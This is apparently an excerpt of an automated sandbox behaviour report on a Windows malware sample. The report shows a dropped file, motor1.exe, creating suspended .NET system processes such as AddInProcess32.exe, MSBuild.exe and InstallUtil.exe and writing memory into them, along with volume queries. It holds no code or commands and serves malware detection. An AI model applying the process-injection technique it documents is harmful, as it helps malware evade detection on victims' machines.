Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 63E008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 111C008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 683008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 899008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 100A008	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: D1E008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8B008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B26008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 227008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DFA008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F2D008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 27C008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B88008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 24A008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AC3008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Progmanh
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp, motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp, motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Queries volume information: C:\Users\user\Desktop\pKxhpP0spW.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
